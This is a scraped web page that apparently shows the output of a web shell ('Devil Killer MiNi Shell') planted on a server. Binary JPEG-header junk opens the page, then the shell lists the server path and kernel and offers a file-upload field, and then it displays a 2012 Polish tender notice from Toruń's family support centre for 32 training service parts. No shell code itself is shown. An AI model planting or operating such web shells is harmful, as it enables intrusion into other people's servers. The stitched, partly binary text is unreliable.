JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120710/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120710/244038-N-2012.html

<p class="kh_header"><b>Toruń: przeszkolenie i udzielenie wsparcia beneficjentom biorącym udział w projekcie systemowym Motywacja - Odpowiedzialność - Praca - Rozwój: MOPR Toruń  w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanym z Europejskiego Funduszu Społecznego, realizowanym przez Miejski Ośrodek Pomocy Rodzinie w Toruniu.</b><br>
<b>Numer ogłoszenia: 244038 - 2012; data zamieszczenia: 10.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Toruniu , ul. Konstytucji 3 Maja 40c, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6508565, faks 056 6586447.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przeszkolenie i udzielenie wsparcia beneficjentom biorącym udział w projekcie systemowym Motywacja - Odpowiedzialność - Praca - Rozwój: MOPR Toruń  w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanym z Europejskiego Funduszu Społecznego, realizowanym przez Miejski Ośrodek Pomocy Rodzinie w Toruniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przeszkolenie i udzielenie wsparcia 616  beneficjentom biorącym udział w projekcie systemowym Motywacja - Odpowiedzialność - Praca - Rozwój: MOPR Toruń w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowanym z Europejskiego Funduszu Społecznego,  realizowanym przez Miejski Ośrodek Pomocy Rodzinie w Toruniu, w następujących blokach:

2.	Przedmiot zamówienia składa się z 32  części:

1)	Część 1 zamówienia - Podniesienie umiejętności fryzjerskich -  stanowi załącznik nr 1 do niniejszej SIWZ;
2)	Część 2 zamówienia  -  Podniesienie umiejętności techniczno-remontowych - stanowi załącznik  nr 2 do niniejszej SIWZ;
3)	Część  3 zamówienia - Podniesienie umiejętności ekonomicznego gotowania I - stanowi załącznik nr 3 do niniejszej SIWZ;
4)	Część 4 zamówienia - Podniesienie umiejętności krawieckich - stanowi załącznik nr 4 do niniejszej SIWZ;
5)	Cześć 5 zamówienia  - Zajęcia z osobami depresyjnymi - stanowi załącznik nr 5 do niniejszej SIWZ;
6)	Część 6 zamówienia  - Zajęcia z osobami zagrożonymi alkoholizmem - stanowi załącznik             nr 6 do niniejszej SIWZ;
7)	Cześć  7 zamówienia - Podniesienie umiejętności w zakresie stylizacji paznokci oraz umiejętności kelnerskich  - stanowi załącznik    nr 7 do niniejszej SIWZ;
8)	Część 8 zamówienia  - Podniesienie umiejętności remontowych (malarz-tapeciarz) I  - stanowi załącznik nr 8 do niniejszej SIWZ;
9)	Cześć 9 zamówienia - Zajęcia z młodzieżą zagrożoną wykluczeniem społecznym    - stanowi załącznik nr 9 do niniejszej SIWZ;
10)	Cześć 10 zamówienia  - Podniesienie umiejętności opieki nad dzieckiem   - stanowi załącznik nr 10 do niniejszej SIWZ;
11)	Część 11 zamówienia - Klub Zajęcia w zakresie podniesienia umiejętności wykonywania drobnych prac remontowych I  - stanowi załącznik                        nr 11 do niniejszej SIWZ;
12)	Część  12 zamówienia - Zajęcia w zakresie podniesienia umiejętności obsługi komputera  -  stanowi załącznik nr 12 do niniejszej SIWZ;
13)	Część 13 zamówienia  - Zajęcia w zakresie podnoszenia umiejętności efektywnej nauki  -  stanowi załącznik nr 13 do niniejszej SIWZ;
14)	Część 14 zamówienia  - Zajęcia z osobami zaburzonymi psychicznie     - stanowi załącznik nr 14 do niniejszej SIWZ;
15)	Cześć 15 zamówienia  - Podniesienie umiejętności ekonomicznego gotowania II  -  stanowi załącznik nr  15  do niniejszej SIWZ;
16)	Cześć 16 zamówienia  - Podniesienie umiejętności remontowych (malarz-tapeciarz) II   -  stanowi załącznik nr 16 do niniejszej SIWZ;
17)	Cześć 17 zamówienia  - Podniesienie umiejętności w zakresie kompetencji wychowawczych i obsługi komputera - stanowi załącznik nr 17 do niniejszej SIWZ;
18)	Cześć 18 zamówienia  - Podniesienie umiejętności w zakresie kompetencji życiowych - stanowi załącznik nr 18 do niniejszej SIWZ;
19)	Cześć 19 zamówienia  - Zajęcia dla osób bezdomnych - stanowi załącznik nr 19 do niniejszej SIWZ;
20)	Cześć 20 zamówienia  - Program Aktywności lokalnej - stanowi załącznik nr 20 do niniejszej SIWZ;
21)	Cześć 21 zamówienia  - Zajęcia dla młodzieży z placówek opiekuńczo-wychowawczych i usamodzielnionych - stanowi załącznik nr 21 do niniejszej SIWZ;
22)	Cześć 22 zamówienia  - Zajęcia dla osób z rodzin zastępczych - stanowi załącznik nr 22 do niniejszej SIWZ;
23)	Cześć 23 zamówienia  - Zajęcia dla rodziców z problemami op-wych. - stanowi załącznik nr 23 do niniejszej SIWZ;
24)	Cześć 24 zamówienia  - Podniesienie umiejętności pracy z osobami niepełnosprawnymi - stanowi załącznik nr 24 do niniejszej SIWZ;
25)	Cześć 25 zamówienia  - Podniesienie umiejętności w zakresie rozwiązywania sporów i konfliktów w rodzinie bez używania przemocy - stanowi załącznik nr 25 do niniejszej SIWZ;
26)	Cześć 26 zamówienia  - Profilaktyka zachowań społecznych - stanowi załącznik nr 26 do niniejszej SIWZ;
27)	Cześć 27 zamówienia  - Zajęcia dla osób dotkniętych problemem przemocy w rodzinie - stanowi załącznik nr 27 do niniejszej SIWZ;
28)	Cześć 28 zamówienia  - Zajęcia dla osób z rodzin dotkniętych problemem alkoholowym - stanowi załącznik nr 28 do niniejszej SIWZ;
29)	Cześć 29 zamówienia  - Podniesienie umiejętności psychologiczno-społecznych - stanowi załącznik nr 29 do niniejszej SIWZ;
30)	Cześć 30 zamówienia  - Skierowanie na zajęcia do szkoły - stanowi załącznik nr 30 do niniejszej SIWZ;
31)	Cześć 31 zamówienia  - Zajęcia z elementami TSR - stanowi załącznik nr 31 do niniejszej SIWZ;
32)	Cześć 32 zamówienia  - Zajęcia z asystentem rodzinnym - stanowi załącznik nr 32 do niniejszej SIWZ;
3.	Szczegółowy harmonogram  realizacji przedmiotu zamówienia  sporządzony zostanie  przez  Zamawiającego i dostarczony wykonawcy w terminie co najmniej 14 dni przed rozpoczęciem realizacji przedmiotu każdej z części zamówienia. Podlega to uzgodnieniu z Wykonawcą.
4.	Zamawiający zastrzega, że istnieje możliwość  realizacji przedmiotu zamówienia w każdym dniu tygodnia, także w soboty i niedziele w godzinach pomiędzy godz. 8:00 i 20:00.

Uwaga:
Wskazana w załącznikach nr od 1 do 32 do niniejszej SIWZ ilość godzin  oznacza godzinę szkoleniową ( 45 min.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 32.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	O udzielenie zamówienia mogą ubiegać się wykonawcy którzy: 
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności tj. 
wpis do rejestru instytucji szkoleniowych, prowadzony przez Wojewódzkie Urzędy Pracy.
2)	posiadają  wiedzę i doświadczenie.
3)	dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia   - szczegółowe kwalifikacje zostały określone w załącznikach do SIWZ odpowiednio od nr 1 do nr 32.
4)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
5)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz oferty -wg załączonego wzoru.
2.	Zaakceptowany projekt umowy o udzielenie zamówienia publicznego -wg załączonej propozycji.
3.	Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji  działalności gospodarczej,  który zakresem działania  obejmuje przedmiot  zamówienia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy Prawo zamówień publicznych wystawioną nie wcześniej niż 6 miesięcy przed terminem składania ofert.
5.	Informację Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych -dot. podmiotów zbiorowych, wystawioną nie wcześniej niż 6 miesięcy przed terminem składania ofert.
6.	Zaświadczenie z właściwego Urzędu Skarbowego, że nie zalega z opłacaniem podatków, opłat lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące  przed terminem składania ofert.
7.	Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych  potwierdzające, że nie zalega z opłacaniem składek na ubezpieczenie społeczne lub zdrowotne lub, że uzyskał przewidziane prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie  w całości wykonania decyzji ZUS,  wystawione nie wcześniej  niż 3 miesiące  przed upływem terminu do składania ofert.
8.	Statut - jeśli uprawnienie do wykonywania przedmiotu zamówienia nie wynika z innego dokumentu np. rejestru firmy wykonawcy.
9.	Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 ustawy.
10.	Oświadczenie, że oferowana usługa spełnia wymagania określone przez zamawiającego.
11.	Oświadczenie wykonawcy, że posiada uprawnienia i spełnia niezbędne warunki do wykonywania prac objętych przedmiotem zamówienia.
12.	Wykaz wykonanych  lub wykonywanych usług będących przedmiotem zamówienia                o wartości co najmniej 50 tys. zł. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane lub są wykonywane należycie.
13.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia  -w zakresie wskazanym w załącznikach do SIWZ od 1 do 32, a także zakresy wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
14.	Oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach                      od   do    stanowią  tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji i jako takie  nie mogą być udostępnione innym uczestnikom  postępowania.
Brak powyższego oświadczenia oznaczać będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy przedsiębiorstwa -wykonawca nie może zastrzec wszystkich dokumentów.
15.	Oświadczenie Wykonawcy jaką część zamówienia zamierza powierzyć podwykonawcom - jeżeli wykonawca przewiduje wykonanie przedmiotu zamówienia przy udziale  podwykonawców.
16.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. VII. 3 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że  nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert.
17.	Jeżeli w kraju pochodzenia osoby lub w kraju,  którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. VII. 3  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu  zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
18.	Upoważnienie do podpisania i złożenia  oferty, chyba że  wynika ono z odrębnych dokumentów.
19.	Dokumenty winny być złożone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli w zakresie praw i obowiązków majątkowych  oferenta, wymienione w aktualnym dokumencie rejestracji firmy lub w innym dokumencie, z którego uprawnienie to wynika.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu, gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości, co do jej prawdziwości.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień umowy, z wyjątkiem wysokości wynagrodzenia, w formie  pisemnej pod rygorem nieważności, gdy zajdą okoliczności, których  nie można było przewidzieć w chwili zawarcia umowy, lub gdy są korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Toruniu ul. Konstytucji 3 Maja 40 c.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Toruniu ul. Konstytucji 3 Maja 40 c p. 115..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy  Motywacja - Odpowiedzialność - Praca - Rozwój: MOPR Toruń  w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013 współfinansowany ze środków  Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Podniesienie umiejętności fryzjerskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 20 osób, łącznie 120 h zajęć grupowych, część w podziale na dwie grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podniesienie umiejętności techniczno-remontowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 20 osób, realizowane w podziale na dwie grupy (każda po 10 osób), łącznie zrealizowanie 60 h.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podniesienie umiejętności ekonomicznego gotowania I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2 grupy (grupa A i grupa B) każda po 10 osób - łącznie 20 osób, 
łącznie zrealizowanie 60 h zajęć grupowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Podniesienie umiejętności krawieckich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia dla 20 osób, realizowane w podziale na dwie grupy (każda po 10 osób), łącznie zrealizowanie 60 h..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zajęcia z osobami depresyjnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10 osób, 190 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zajęcia z osobami zagrożonymi alkoholizmem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10 osób, 190 h zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Podniesienie umiejętności w zakresie stylizacji paznokci oraz umiejętności kelnerskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrealizowanie 72 h dla 20 osób, część zajęć w podziale na 2 grupy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
